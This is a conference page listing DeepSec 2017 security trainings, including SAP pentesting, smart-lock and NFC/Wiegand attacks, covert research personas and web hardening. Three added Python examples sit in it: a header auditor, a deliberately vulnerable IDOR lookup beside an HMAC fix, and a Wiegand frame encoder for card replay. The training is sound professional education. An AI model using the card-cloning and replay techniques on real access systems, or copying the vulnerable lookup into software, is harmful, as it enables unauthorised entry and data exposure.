Speakers (preliminary) - DeepSec IDSC 2017 Europe

Advanced Penetration Testing In The Real World

Guillaume Lopes (Cisco) / Davy Douhine (RandoriSec)

A two-day, 100% “hands-on” workshop.

Main topics:

  • Buffer overflow 101: Find and exploit buffer overflows yourself and bypass OS protections (because a lot of pentesters don’t even know how it works under the hood);
  • Web exploitation: Manually find and exploit web app vulnerabilities using Burp Suite (yes, running WebInspect, AppScan, Acunetix or Netsparker is fine, but you can do a lot more by hand);
  • Network exploitation: Manually exploit network-related vulnerabilities using Scapy, Ettercap and Responder (because it works so often when doing internal pentests);
  • Passwords: Optimize the way you attack offline and online passwords (0day is fun, but the way attackers get in most of the time is simply by using logins/passwords);
  • iOS/Android app hacking: Find and exploit mobile app vulnerabilities using Needle, Frida, Cycript and Hopper (companies move their apps to the cloud and the mobile world, so pentesters have to evolve … or die).

Founder of RandoriSec, a security-focused IT firm, Davy Douhine has been working in the ITSec field for almost fifteen years. He has mainly worked for financial, banking and defense key accounts, doing pentests and trainings to help them improve their security.

Guillaume Lopes has been working in the pentest field for about 10 years.
He has written many ITSec articles and has attended many security conferences.

How To Be A Ghost

Rhett Greenhagen and Jean Yav (McAfee)

In the security community, most threat researchers are conducting research in an insecure and time-consuming environment. Whether intelligence is gathered from private communications over an IRC server or postings on an underground forum, researchers must be able to identify, document, and disseminate their findings quickly and without compromise. Having a secure and monitored enterprise covert communications framework in place will allow your researchers to focus on producing finished intelligence. In this workshop, we will discuss everything from creating/securing system architecture to developing methods for automation, all while staying protected.
The speakers will begin by detailing virtual server presence and configurations for virtual machines. The systems will be set up properly with the tools and services commonly required by researchers. Network communications and anonymization techniques will also be covered in depth. This includes best practices for buying online services with Bitcoin and cash, the caretaking and sharing of online personas, and demonstrations of how actions taken on a website, IRC server, forum, or gaming chat room can be traced back to the researcher. Counter-log activities, the integration of mobile/social platforms, and legal implications/nuances will also be discussed.
The Advanced Programs Group within McAfee has experience in conducting sensitive and timely investigations in an enterprise environment. APG’s lessons learned in creating and maintaining these systems can assist research teams of any size in their endeavor to be more secure and deliver timely intelligence.


Presentation Outline
⦁ Introduction and key terms (VPN, VPS, COVCOM, COLLCO, etc…)
⦁ Basic terminology

⦁ ESXi Architecture and Hypervisor Support
⦁ How to install ESXi and lock it down for specific tasks
⦁ How to create different templates for different types of research
⦁ Disabling services and systems configuration to counter malware infections and stop infections from breaking out of the analyst’s virtual machine
⦁ Which services to enable to allow malware analysis to take place using tools such as Cuckoo Sandbox or McAfee ATD

⦁ Creating Virtual Private Servers
⦁ How to purchase virtual private servers anonymously
⦁ Creating network communication between virtual private servers and virtual private networks for effective communication
⦁ Registering with a Regional Internet Registry and acquiring a /24 (IPv4) and a /48 (IPv6) network
⦁ Getting connectivity between your Virtual Private Servers and the covert network
⦁ How to choose a secure address and BGP sessions based on pricing and anonymity

⦁ Social Media
⦁ Creating online personas for long term investigations, and how to document the usage of the persona so that any analyst can be assigned a persona
⦁ Behavior differences between online personas in places such as forums and IRC servers
⦁ How to track social media accounts being used by the analyst with alerts to keep a persona alive

⦁ Developing collections
⦁ How to run automated scrapes to gather intelligence for later investigations
⦁ How to log behavior within an IRC server covertly
⦁ Develop methods and working pipelines to gather information from closed sources regularly without being identified as a scheduled process

⦁ Ways researchers get caught
⦁ How researchers have been d0xed, case examples and how they could have been prevented
⦁ 10 commandments of things a researcher should always follow while ‘acting’ out an online persona
⦁ Using bitcoin to create and setup accounts/systems/network/etc

⦁ How to stay legal
⦁ General thoughts and ideas that might arise, in situations ranging from being pressured to attack a server to being sent unsolicited pictures

Attendee Takeaways
⦁ How to develop a secure environment that can be used to conduct online investigations and stay secure. How tools leave traces and how they interact with online instances.
⦁ How to conduct malware analysis within an enterprise network with systems put into place to help with automated malware analysis.
⦁ How to keep network communications secure and anonymous.
⦁ Understanding requirements for threat intelligence research and knowing how actions can be countered by forms of counter intelligence.

Rhett Greenhagen has worked in the NetSec/IC for over a decade. He specializes in open source intelligence, cyber counter-intelligence, profiling, exploitation, malware analysis, and technical research and development. Career highlights include Primary Forensic Investigator for the DoD’s largest data center as well as senior technical positions for multiple defense contracting companies. Rhett is currently working for the Advanced Programs Group at McAfee.

Jean Yav (@projekrex) is a Security Engineer at one of the world’s largest dedicated security technology companies. He has spent the last fifteen years supporting blue team operations in the healthcare and nonprofit industries. Jean Yav’s official billets have included System Engineer, Network Security Analyst, and System Administrator and his specialties include security, offensive techniques, virtualization, and automation. In his spare time, he also studies hardware and embedded device hacking. Jean is a Maryland native and occasionally speaks at local Linux User Groups and hacker spaces.

Hunting The Adversary: Developing And Using Threat Intelligence

John Bambenek (Fidelis Cybersecurity / SANS Internet Storm Center)

Traditional security defense tools are increasingly unable to protect against current and emerging attacks. The modern attacker has adopted advanced tools and techniques that cannot be stopped by traditional firewalls, intrusion detection and anti-virus. Meanwhile, dedicated attackers attempt intrusions over months and years while going undetected, stealing valuable information, trade secrets and financial data. Defense techniques that leverage information about attackers and their techniques, however, can greatly enhance the security of an organization.

Modern defenses can integrate intelligence and counterintelligence information which greatly increases the ability to keep attackers out and to detect their presence quickly. This course will teach students about the tools they can use to gain insight into attackers and to integrate them into their organization. This course will be a mix of lecture and hands-on training so students will be equipped on day one to go back to their work and start using threat intelligence to protect their networks.

TOPICS COVERED:

- Critical Thinking, ACH and Threat Intelligence Models
- Intelligence Sharing Mechanisms
- Open Source Intelligence Gathering, Tools and Sources
- The Collective Intelligence Framework
- Malware Information Sharing Platform
- Yara Primer for Threat Intelligence
- Malware Surveillance Techniques
- Creating and Deriving Intelligence Data
- Identifying Adversarial Weaknesses and Disruption Operations
- Defensive and Offensive Deception Techniques

WHO SHOULD ATTEND

Investigators, network defenders, incident responders and anyone interested in how to use intelligence to get ahead of the adversary.

WHAT STUDENTS SHOULD BRING

A laptop capable of running VMs (specific OSes and configs will be sent to students prior to class)

WHAT STUDENTS NEED TO KNOW

Basic scripting (bash or python), understanding of reverse engineering malware and sandboxing, knowledge of networking and DNS.

John Bambenek is Manager of Threat Systems at Fidelis Cybersecurity, Lecturer in the Department of Computer Science at the University of Illinois at Urbana-Champaign and a handler with the SANS Internet Storm Center. He has over 18 years of experience in information security and leads several international investigative efforts tracking cybercriminals, some of which have led to high-profile arrests and legal action. He specializes in disruptive activities designed to greatly diminish the effectiveness of online criminal operations. He produces some of the largest bodies of open-source intelligence used by thousands of entities across the world.

Open Source Defensive Security

Leszek Mis (Defensive Security)

Open Source Defensive Security Training is an Open Source IT security laboratory dedicated to professionals who want to close the gaps in their Linux and Open Source security knowledge. Very detailed and up-to-date course content, with a particular focus on the defensive approach, gives you the best opportunity to create stronger defensive layers inside your network infrastructure and/or Linux-based products. Delivering real-world scenarios in our Open Source Defensive Security hands-on lab provides the very practical knowledge you need to expand your Linux security skills.

This is an extremely deep-dive training on Open Source-based infrastructure security, Linux system and network service hardening. We like details, as attackers do, and these details make all the difference, in both the offensive and the defensive approach. Our workshop has a unique formula when it comes to “protection vs attack”: most of the security issues we talk about will be effectively mitigated by the use of a suitable approach, sophisticated software and a dedicated secure configuration.

We focus on delivering defensive content, but we understand that to be good in defense you also have to be good in offense. We provide a mix of knowledge in both fields using Open Source software. Apart from basic Linux skills and TCP/IP knowledge, most of the lab exercises require at least a basic understanding of how attacker techniques work, and so we will introduce you to them. We strongly believe that only a mix of broad, systematic defensive and offensive security knowledge can guarantee secure solutions.


1) Threats are everywhere - Introduction to the technical Open Source Defensive Security program.

2) Web application security -> hardened Reverse Proxy -> modsecurity vs HTTP security issues:

Analysis and practical use of exploits for popular web applications: Jenkins, Zimbra, PHPnuke, Joomla, Drupal, PHPmyadmin, OScommerce, Magento, Wordpress, dotProject and others
Authorization and authentication: CAS SSO, OAuth, SAML (Ipsilon), federation, Basic / Digest auth, SSL authentication, LDAP authorization, SAML-based (mod_auth_mellon), Kerberos-based (mod_auth_kerb), login-form-based (mod_intercept_form_submit), mod_lookup_identity, mod_pubcookie
HTTPS – how to achieve an A+ rating:
Attacks:
Heartbleed
Breach
Drown
Beast
Poodle
MiTM: sslstrip
Mutual SSL
Security headers and browser mechanisms: Content Security Policy (CSP), Same Origin Policy (SOP) / Cross Origin Resource Sharing (CORS), X-Frame-Options, X-Content-Type-Options, X-XSS-Protection, Fetch API, Service Workers, Subresource Integrity, per-page suborigins, HTTP Strict Transport Security (HSTS), HPKP, PFS
Cookies: Secure, HttpOnly, Domain, Path, SameSite; Clear-Site-Data, Feature-Policy, first-party cookies
HTTP header anomalies
Virtual patching
Full HTTP auditing
LUA/OpenResty support
Sensor approach - OWASP Appsensor
Web application security using Modsecurity - creating dedicated WAF rules against:
Injections
Null bytes
Path/directory traversal
LFI/RFI->Command Execution
Cross Site Scripting (XSS)
Cross Site Request Forgery (CSRF)
HTTP Parameter Pollution (HPP)
Open Redirect
Insecure Direct Object Reference vs HMAC
Forceful Browsing
CSWSH - Cross Site Websocket Hijacking
Session Security
Brute force
Slow DOS
GEO restrictions
Error handling
Leakage detection
Secure file upload
Secure logout / forgot password form
Web honeypots
Bot/scan protection
AV protection
PHP Security
Tomcat Security
Tools:
Sqlmap, sqlninja
Xsser
Dominator
Skipfish
ZAP / Burp
Wafdetect
Joomla, wpscan
Dirbuster, dirb
Nikto
JSDetox
Brakeman
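The HTTPS, security-header and cookie items in the outline above describe what a hardened reverse proxy should emit. The following script is an added example, not part of the course material or the trainer's tools: it audits a captured HTTP response against those headers and cookie attributes and reports what is missing or weak. The two responses are constructed samples, and the six-month HSTS threshold is our assumption of what an A+ rating expects.

```python
"""Audit an HTTP response's security headers and cookie flags.

Added example (not part of the training material). Headers are given as
(name, value) pairs because Set-Cookie may legitimately repeat.
"""
import re

# Constructed sample responses, not real captures.
WEAK_RESPONSE = [
    ("Server", "Apache/2.4.18 (Ubuntu)"),
    ("Content-Type", "text/html"),
    ("Set-Cookie", "PHPSESSID=abc123; Path=/"),
    ("Set-Cookie", "lang=en; Path=/; SameSite=None"),
]

HARDENED_RESPONSE = [
    ("Server", "Apache"),
    ("Content-Type", "text/html"),
    ("Strict-Transport-Security", "max-age=31536000; includeSubDomains; preload"),
    ("Content-Security-Policy", "default-src 'self'; frame-ancestors 'none'"),
    ("X-Content-Type-Options", "nosniff"),
    ("X-Frame-Options", "DENY"),
    ("Set-Cookie", "PHPSESSID=abc123; Path=/; Secure; HttpOnly; SameSite=Lax"),
]

MIN_HSTS_AGE = 15768000  # six months; assumed minimum for an A+ rating


def parse_set_cookie(value):
    """Split 'name=value; Attr; Attr=val' into (name, {attr_lower: val})."""
    parts = [p.strip() for p in value.split(";")]
    name, _, _ = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name, attrs


def audit_cookie(value):
    """Findings for one Set-Cookie header: Secure, HttpOnly and SameSite."""
    name, attrs = parse_set_cookie(value)
    findings = []
    if "secure" not in attrs:
        findings.append(f"cookie {name}: missing Secure")
    if "httponly" not in attrs:
        findings.append(f"cookie {name}: missing HttpOnly")
    samesite = attrs.get("samesite", "").lower()
    if not samesite:
        findings.append(f"cookie {name}: missing SameSite")
    elif samesite == "none" and "secure" not in attrs:
        findings.append(f"cookie {name}: SameSite=None requires Secure")
    return findings


def audit_response(headers):
    """Return a list of human-readable findings; empty means nothing flagged."""
    lower = {}
    findings = []
    for name, value in headers:
        if name.lower() == "set-cookie":
            findings.extend(audit_cookie(value))
        else:
            lower[name.lower()] = value

    hsts = lower.get("strict-transport-security")
    if hsts is None:
        findings.append("missing Strict-Transport-Security")
    else:
        match = re.search(r"max-age=(\d+)", hsts, re.I)
        if not match or int(match.group(1)) < MIN_HSTS_AGE:
            findings.append("HSTS max-age shorter than six months")

    csp = lower.get("content-security-policy")
    if csp is None:
        findings.append("missing Content-Security-Policy")
    elif "'unsafe-inline'" in csp:
        findings.append("CSP allows 'unsafe-inline'")

    # Either header defends against clickjacking; frame-ancestors is the modern one.
    if "x-frame-options" not in lower and not (csp and "frame-ancestors" in csp):
        findings.append("no clickjacking protection (X-Frame-Options / frame-ancestors)")

    if lower.get("x-content-type-options", "").lower() != "nosniff":
        findings.append("X-Content-Type-Options is not nosniff")

    # Leakage detection: a version number in Server helps an attacker pick exploits.
    server = lower.get("server", "")
    if re.search(r"\d", server):
        findings.append(f"Server header leaks version: {server}")
    return findings


if __name__ == "__main__":
    for label, response in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, audit_response(response) or "OK")
```

Feed it the header block of a real response (for example from Burp or curl -I) and use the findings list as the checklist for the proxy's configuration; the HSTS threshold and the Server-header heuristic are the knobs most teams adjust.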
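For the "Insecure Direct Object Reference vs HMAC" item in the outline, the following added example (ours, not the trainer's material) puts the classic IDOR handler beside a reference that carries an HMAC bound to both the object and the requesting user, so a tampered or borrowed reference is rejected. The server key, the document store and the user names are constructed placeholders. The tag complements, rather than replaces, a server-side ownership check.

```python
"""IDOR: untrusted object ids versus HMAC-protected object references.

Added example, not part of the training material. The server key, the
document store and the user names below are constructed placeholders.
"""
import base64
import hashlib
import hmac

# Assumption: a per-deployment secret loaded from configuration in real use.
SERVER_KEY = b"constructed-demo-key-replace-me"
TAG_LEN = 16  # 128-bit truncated HMAC-SHA256 tag

# Constructed sample store: object id -> document (owner in the name for clarity).
DOCUMENTS = {1001: "alice-salary.pdf", 1002: "bob-salary.pdf"}


def vulnerable_lookup(user_id, object_id_param, documents=DOCUMENTS):
    """Classic IDOR: the id taken from the request is trusted as-is,
    so any authenticated user can fetch any document by changing the number."""
    return documents.get(int(object_id_param))


def _tag(user_id, object_id, key):
    # The MAC covers the requesting user too, so a reference issued to one
    # user is useless in another user's session.
    msg = f"{user_id}:{object_id}".encode()
    return hmac.new(key, msg, hashlib.sha256).digest()[:TAG_LEN]


def make_ref(user_id, object_id, key=SERVER_KEY):
    """Issue an opaque reference '<id>.<tag>' for links and form fields."""
    tag = base64.urlsafe_b64encode(_tag(user_id, object_id, key)).decode().rstrip("=")
    return f"{object_id}.{tag}"


def resolve_ref(user_id, ref, key=SERVER_KEY):
    """Return the object id if the tag is valid for this user, else None."""
    object_id, sep, tag_b64 = ref.partition(".")
    if not sep or not object_id.isdigit():
        return None
    try:
        tag = base64.urlsafe_b64decode(tag_b64 + "=" * (-len(tag_b64) % 4))
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    # Constant-time comparison: a plain == would leak the tag byte by byte.
    if len(tag) != TAG_LEN or not hmac.compare_digest(tag, _tag(user_id, int(object_id), key)):
        return None
    return int(object_id)


def safe_lookup(user_id, ref, documents=DOCUMENTS):
    """Resolve the reference first; the tag binds the id to this user.
    A real application would still check ownership in the data layer."""
    object_id = resolve_ref(user_id, ref)
    return None if object_id is None else documents.get(object_id)


if __name__ == "__main__":
    ref = make_ref("bob", 1002)
    print("bob's own ref:", safe_lookup("bob", ref))
    tampered = "1001." + ref.split(".", 1)[1]
    print("tampered id:", safe_lookup("bob", tampered))
    print("alice's ref in bob's session:", safe_lookup("bob", make_ref("alice", 1001)))
    print("IDOR handler:", vulnerable_lookup("bob", "1001"))
```

The reference stays readable (the id is in clear), which keeps debugging simple; what the attacker cannot do is forge the tag for another id or reuse a tag issued to another user. Rotate the key with care: every outstanding reference becomes invalid when it changes.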
3) Hardened Linux vs exploits/rootkits:

Discretionary Access Control (DAC) vs Mandatory Access Control (MAC)
Grsecurity / PAX
SELinux / Multi Category Security / sVirt
Apparmor, Tomoyo, Smack, RSBAC
GCC hardening: SSP, NX, PIE, RELRO, ASLR vs buffer overflow
Linux Containers - Docker/LXC
LKM-off / YAMA / enforcing
Linux capabilities vs SUID and others
System call restriction - seccomp
Integrity checking - IMA/EVM
Package mgmt security
Debuggers and profilers - gdb/strace/ldd/Valgrind/Yara
Chroot/jail/pivot_root
Behavioural analysis - systemtap / LTTng / sysdig
Memory forensics - Volatility vs malware
PAM / 2FA
System update vs reboot
*privchecks
4) Network security:

Vulnerability scanning:
Nmap NSE
Seccubus
OpenVAS
Metasploit
Linux Domain Controller - IdM/HBAC/SUDO
SFTP/SCP - Secure SSH Relay
Restricted shells/commands
SSH tips and tricks
Public Key Infrastructure – SSL/TLS
NFS Security
Database Security
DNS Security
Mail Security
DOS / scanning / brute-force protection techniques
Advanced network firewall: iptables/nftables/ebtables
System honeypots
Network traffic analysis - wireshark, scapy / tcpdump / tcpreplay
Suricata / Bro IDS / Snort / SELKS vs known malware and attacks:
metasploit,
PtH,
Heartbleed,
shellshock and others
Security by obscurity
5) System auditing, integrity & accounting:

*syslog
auditd
OSSEC / Samhain / aide
SIEM: Splunk/ELK/OSSIM/osquery
6) Summary: offense vs defense. Additional labs:

GDB introduction LAB
Seccomp -> additional LABs
Apparmor policy development
Volatility LAB - diffing between infected and clean memory dumps
Malware PCAP analysis / tcpreplay / suricata+ELK (SELKS) / cuckoo / limon sandbox
SELinux module development
PAX - policy development
PAM LAB: google-authenticator / yubikey
Simple kernel module development + hiding + detection
Suricata vs metasploit, PtH, heartbleed, shellshock and others
WLAN Security vs Evil Twin / Karma and others attack detection

Leszek Miś has over 11 years of experience in IT security technology, supporting some of the largest companies and institutions with implementation, consulting and technical training. Furthermore, he has 8 years of experience in teaching and transferring technical knowledge. He has trained more than 500 people, with an average evaluation of 4.9 on a 1-to-5 scale. He is an IT Security Architect with a love for pentesting and a recognized expert in enterprise Open Source solutions; he provides web application and infrastructure penetration tests and specializes in Linux/OS hardening and defensive security of web application platforms.

He is a known and respected trainer/examiner of Red Hat products in Poland (RHCA, RHCSS, RHCE) and author of many IT Security workshops (ModSecurity, FreeIPA, SELinux, Linux Hardening).

As a speaker he has attended many conferences, including Confidence 2016 (“Honey(pot) flavored hunt for cyber enemy”), PLNOG 2016 (“Yoyo! It’s us, packets! Catch us if you can”), NGSEC 2016 (“Many security layers for many defensive opportunities”), Open Source Day 2010/2011/2012/2013/2014, SysDay 2008 (“SELinux vs exploits”), Confitura 2014 (“Detection and elimination of threats in real time - OWASP Appsensor in action”), Red Hat Roadshow 2014, OWASP Chapter Poland 2015 (“Does your WAF can handle it?”), ISSA InfoTrams 2015 and BIN Gigacon 2015 (“Mapping pen testers knowledge for the need to protect a critical IT infrastructure”).

Certifications :

Holder of OSCP, Red Hat Certified Architect, Red Hat Certified Security Specialist, RHCDS, CompTIA Security+, Splunk Certified Architect and others.

SAP CTF Pentest : From Outside To Company Salaries Tampering (closed)

Yvan Genuer (Devoteam)

SAP is no longer an unknown black box for the security community, and SAP products appear more and more often in audit requests. This training is focused on SAP NetWeaver. Because we can't seriously cover all SAP software in two days, we decided to work on the most frequent vulnerabilities we have faced during our pentests. We'll provide several SAP systems with different configuration issues in a 'realistic' environment, as well as a pre-configured attacker VM with all the tools required to perform the training activities. Few slides, lots of practice: that's the leitmotiv of this course. SAP knowledge is not required.

Prerequisites:
General knowledge of pentesting. SAP knowledge is NOT required.


Target audience:
Pentesters or security professionals; anyone interested in learning about SAP security.

Requirements / Material to bring by attendees:
A laptop capable of running a virtual machine, with 10 GB of free disk space and 1 GB of RAM for the VM.

Similar works:
This course is an improved version of the training given at the Hack In Paris 2017 conference. I've created two 'easy' SAP challenges for the free security platform ‘root-me’: https://www.root-me.org/en/Challenges/Realist/SAP-Pentest-007
https://www.root-me.org/en/Challenges/Realist/SAP-Pentest-000
These challenges are not the same as the ones in this course.


Agenda:
Detailed presentation material will be provided to attendees at the start of course.
Please find the course outline below: 

Day 1

Introduction
Introduction to the world of SAP
SAP?
SAP in numbers
SAP Netweaver ABAP?
Global technical concept
Technical component
SAP as user

Introduction to SAP Security
Latest changes in SAP Security
The SAP security parts
SAP Security Notes
Attack surface
Risks


Training infrastructure
Overview and warning
Kali-SAP    
Hands-on : Tools, installation, setup
SAP cheatsheets for pentesters


SAProuter
What is SAProuter?
How SAProuters work
SAProuter vulnerabilities
   Hands-on : Discover internal SAP, discover SAP port, forward port
Remediation

SAP Gui
Overview & How to
   Hands-on : Moving around SAP Gui
SAP Gui information gathering
SAP Gui shortcut vulnerability
    Hands-on : Retrieve information, crack user password
Latest vulnerabilities found
Remediation

SAP Netweaver ABAP
Overview
SAP authorization
Password and default accounts
    Hands-on : Find default account and password of target 
SAP Message Server
    Hands-on : Playing with Message Server
SAP ICM
    Hands-on : Playing with ICM
SAP MMC
    Hands-on : Playing with MMC
SAP RFC Gateway
    Hands-on : RCE through SAP Gateway
Remediation

Day 2

SAP Secure Store
Overview
ABAP Secure Storage
   Hands-on : Decrypt ABAP Secure Storage
Secure Storage in File System
   Hands-on : Decrypt SSFS
Remediation


Database level security
Overview
Focusing on Oracle
Oracle OPS$ attack
    Hands-on : Retrieve SAP database schema password
Remediation


SAP Horizontal movement
Concept in SAP
RFC hardcoded credential
    Hands-on : Get access to trusted SAP system with dialog user
    Hands-on : Get access to trusted SAP system with non-dialog user
Pivot with SAP RFC Gateway
   RCE to trusted RFC SAP system
Remediation


SAP Vertical movement
Concept in SAP
    Hands-on : SAP to OS
    Hands-on : OS to database
    Hands-on : SAP to database
    Hands-on : Database to SAP
Remediation


ABAP Code vulnerability (Overview)
Introduction
ABAP Minimum basis
ABAP injection
   Hands-on : Exploit abap injection
OS Command injection
   Hands-on : Exploit OS injection
Native SQL Injection
   Hands-on : Exploit SQLi
Authorization bypass
   Hands-on : Bypass authorization example
Directory traversal
   Hands-on : Exploit directory traversal
Cross client access
   Hands-on : Cross client access example
Understand SAP OSS Security Patch
   Hands-on : From SAP Security Patch to bind shell
Remediation


CTF
5 Categories for 20+ tasks
    Hands-on : CTF time !
Correction


References
Conclusion & Questions

Yvan has nearly 15 years of experience in SAP. He started out as an SAP Basis administrator for various well-known French companies. For the last 5 years he has focused on SAP security and is now head of SAP assessment and pentesting in the Devoteam security team. Although a very discreet person, he has received official acknowledgements from SAP AG for vulnerabilities he reported. Furthermore, he is a longtime member of the GreHack conference organization committee and has conducted an SAP pentest workshop at Clusir 2017, as well as a full training at Hack In Paris 2017.

Smart Lockpicking - Hands-on Exploiting Contemporary Locks and Access Control Systems

Slawomir Jasek (SecuRing; smartlockpicking.com)

There is no doubt electronic locks are among the most profitable smart devices to attack. And yet recent disclosures of multiple vulnerabilities clearly show there are not enough specialists able to help with the software-related issues of what have so far been mostly hardware vendors.
This course is intended to fill this skills gap. Based on hands-on exercises with real devices (a dozen various smart locks), attendees will learn how to analyze their security and how to design them properly. The knowledge can then be applied to many other IoT devices.
During this course students will perform: wireless sniffing, spoofing, cloning, replay, DoS and authentication and command-injection attacks. Practical exercises will include investigating proprietary network protocols, demystifying and breaking “military grade encryption”, abusing excessive services, triggering fallback open, brute-forcing PINs via voice calls and attacking building automation systems.
The software activities will be mixed with short entertaining tricks, including opening a lock by a strong magnet, counterfeiting fingerprints in a biometric sensor or opening a voice-controlled lock by remotely hacking speaker-enabled devices.
Several tasks will revolve around an electromagnetic lock guarding a special vault. Whenever a student succeeds in hacking the lock, the box opens automatically and reveals a hidden reward.

Technologies covered will include Bluetooth Smart, Linux embedded, KNX, NFC, Wiegand, WiFi, P2P, GSM etc.

Each attendee will receive hardware with a value of about 100 EUR (detailed below).


List of topics:

Bluetooth Smart - based on at least 7 various smart locks, and tools developed by the trainer: GATTacker BLE MITM proxy and deliberately vulnerable Hackmelock (consisting of Android mobile application and lock device simulated on Raspberry Pi):
- passive sniffing
- static authentication password
- spoofing
- replay attacks
- command injection
- Denial of Service
- cracking "Latest PKI technology"
- other flaws of custom challenge-response authentication
- abusing excessive services (e.g. module's default AT-command interface).
- weaknesses of key sharing with guests functionality
- takeaway Hackmelock challenges for practicing later at home using provided hardware

NFC - based on hotel electronic door lock, access control reader, ski lift pass and a bus ticket
- clone UID using a "Chinese magic" card and provided hardware
- cracking MIFARE Classic keys
- cloning card content
- decoding access control data stored on card by a hotel system
- how to emulate contactless cards and open UID-based lock using just a smartphone

Linux embedded - based on wireless door lock, alarm+home automation system and other devices:
- authentication bypass
- information disclosure
- telnet brute-force
- OS command injection

Proprietary network protocols - based on fingerprint sensor device, wireless door lock, alarm system, HVAC controller
- various approaches to analyzing proprietary protocols
- step-by-step understanding packets and attacking - remote management binary communication of fingerprint sensor
- sniffing and decoding administrative credentials
- abusing improper session management (authentication bypass)
- unlock wireless alarm with a single packet
- P2P communication - how to attack devices hidden behind NAT

KNX home automation - an example installation connected to electromagnetic lock
- theory introduction, typical architecture, group address, device address...
- tools: ETS configuration suite vs open-source - knxd, knxmap, nmap scripts
- how to locate and connect to a KNX-IP gateway in the LAN or remotely
- monitor mode - sniffing the bus communication
- write command to group address and open lock

SMS and DTMF remote control over GSM - based on remote control alarm system
- theory introduction to GSM interception
- brute-force alarm administrative PIN via automated remote SMS and voice calls from the cloud API

Wiegand - wired access control transmission standard
- sniff the data transmitted from access control reader using Raspberry Pi GPIO
- decode card UID from sniffed data, clone the card
- replay card data on the wire to open lock
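The Wiegand items above (sniff, decode the UID, replay) come down to understanding the 26-bit frame. The following is an added example, not the trainer's code: it verifies both parity bits, decodes facility code and card number, re-encodes a frame for replay and maps each bit to the D0/D1 line that carries it. Capturing the bits from the reader's lines (for example with Raspberry Pi GPIO interrupts) is outside the example; the sample frame is constructed, not a real capture.

```python
"""Decode, verify and re-encode a 26-bit Wiegand frame.

Added example (not part of the training material or the trainer's tools).
Standard 26-bit Wiegand layout: bit 0 = even parity over bits 1-12,
bits 1-8 = facility code, bits 9-24 = card number, bit 25 = odd parity
over bits 13-24. The frame below is a constructed sample.
"""

SAMPLE_FRAME = "10010101000000101001110011"  # constructed: facility 42, card 1337


def decode_wiegand26(frame):
    """Return (facility, card) for a 26-bit frame, raising on parity errors."""
    bits = [int(c) for c in frame.strip()]
    if len(bits) != 26 or any(b not in (0, 1) for b in bits):
        raise ValueError("need exactly 26 bits of 0/1")
    # Even parity: bit 0 makes the count of ones in bits 0-12 even.
    if bits[0] != sum(bits[1:13]) % 2:
        raise ValueError("even parity error (bits 0-12)")
    # Odd parity: bit 25 makes the count of ones in bits 13-25 odd.
    if bits[25] != (sum(bits[13:25]) + 1) % 2:
        raise ValueError("odd parity error (bits 13-25)")
    facility = int("".join(map(str, bits[1:9])), 2)
    card = int("".join(map(str, bits[9:25])), 2)
    return facility, card


def encode_wiegand26(facility, card):
    """Build a 26-bit frame (as a string of 0/1) for a facility/card pair."""
    if not 0 <= facility < 256 or not 0 <= card < 65536:
        raise ValueError("facility is 8 bits, card number is 16 bits")
    payload = [int(c) for c in f"{facility:08b}{card:016b}"]
    even = sum(payload[:12]) % 2           # covers frame bits 1-12
    odd = (sum(payload[12:]) + 1) % 2      # covers frame bits 13-24
    return "".join(map(str, [even] + payload + [odd]))


def to_pulses(frame):
    """Map a frame to the line that is pulsed for each bit.

    On the wire a 0 is a pulse on D0 and a 1 is a pulse on D1; replaying
    the frame means driving these lines in this order with the reader's timing.
    """
    return ["D0" if c == "0" else "D1" for c in frame]


if __name__ == "__main__":
    facility, card = decode_wiegand26(SAMPLE_FRAME)
    print(f"facility={facility} card={card}")
    assert encode_wiegand26(facility, card) == SAMPLE_FRAME
    print(" ".join(to_pulses(SAMPLE_FRAME)))
```

A frame that fails a parity check is usually a sampling problem (missed or doubled pulses) rather than a different format; if a site uses a longer format, the field widths and parity spans change, but the approach is the same.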

Moreover, each student will also be able to try for themselves to:
- open a smart lock using special strokes of a strong magnet, which turns the motor inside the device
- cheat on a fingerprint biometric sensor - we can make your own fingerprint clone during training
- open a voice-controlled lock by hacking a nearby speaker-enabled device


What students should bring?
- contemporary laptop capable of running Kali Linux in virtual machine
- Android > 4.3 smartphone. If you don't have one, please let us know in advance - a few will be available for students.
- basic familiarity with Linux command-line, Kali, Wireshark
- scripting skills or pentesting experience will be an advantage, but is not crucial

What will be provided?
- course materials in PDFs (several hundred pages)
- all required additional files: source code, documentation, installation binaries
- Bluetooth Smart hardware sniffer and development kit based on the nRF51822 module
- 2 Bluetooth Low Energy USB dongles
- Raspberry Pi 3 with assessment tools and Hackmelock for further hacking at home.
- NFC NXP PN532 board + "magic UID" card - which will allow you to clone the most common MIFARE Classic contactless cards

Provided hardware picture:
http://smartlockpicking.com/img/events/hardware.jpg

Slawomir is an IT security consultant with over 10 years of experience. He has participated in many assessments of the security of systems and applications for leading financial companies and public institutions across the world, including a few dozen e-banking systems. He has also developed secure embedded systems certified for use by national agencies. Slawomir has an MSc in automation & robotics and loves to hack various devices, gadgets, home automation and industrial systems. Besides his current research (BLE, HCE), he focuses on consulting on secure solutions for various software and hardware projects. Speaker at BlackHat USA (new Bluetooth Smart man-in-the-middle proxy tool), AppSec EU (insecurity of proprietary network protocols), HITB (HCE contactless payments), Confidence (IoT), Devoxx and other conferences for developers (SDLC, mobile application security). Trainer at DeepSec, AppSec EU, HackInParis, HackInTheBox, Confidence.

Workshop On Advanced Social Engineering

Dominique Brack (Reputelligence)

For the first time Dominique Brack, the author of the Social Engineering Engagement Framework (SEEF), offers an in-person public workshop. Normally his workshops and briefings are closed-group private enterprise or government-only workshops. Attendees will profit from the first-hand knowledge and experience of a social engineering and information security professional with 20 years of experience.

What you will learn: tools and techniques to plan, execute and manage social engineering engagements. What can and will be used against you, your employees and your organization? This training will provide the skills to detect, defend against and assess social engineering attacks and their associated risks. You will learn about the motivations and methods used by social engineers, knowledge which will enable you to better protect yourself and your organization.

Dominique C. Brack is a recognized expert in information security, including identity theft, social media exposure, data breach, cyber security, human manipulation and online reputation management. He is a highly qualified, top-performing professional with outstanding experience and achievements within IT security, risk and project management and in delivering innovative, customer-responsive projects and services in highly sensitive environments on an international scale. Mr. Brack is accessible, authentic, professional, and provides topical, timely and cutting edge information. Dominique’s direct and to-the-point tone of voice can be counted on to capture attention, and – most importantly - inspire and empower action.

Mobile App Attack

Sneha Rajguru (Payatu software labs llp)

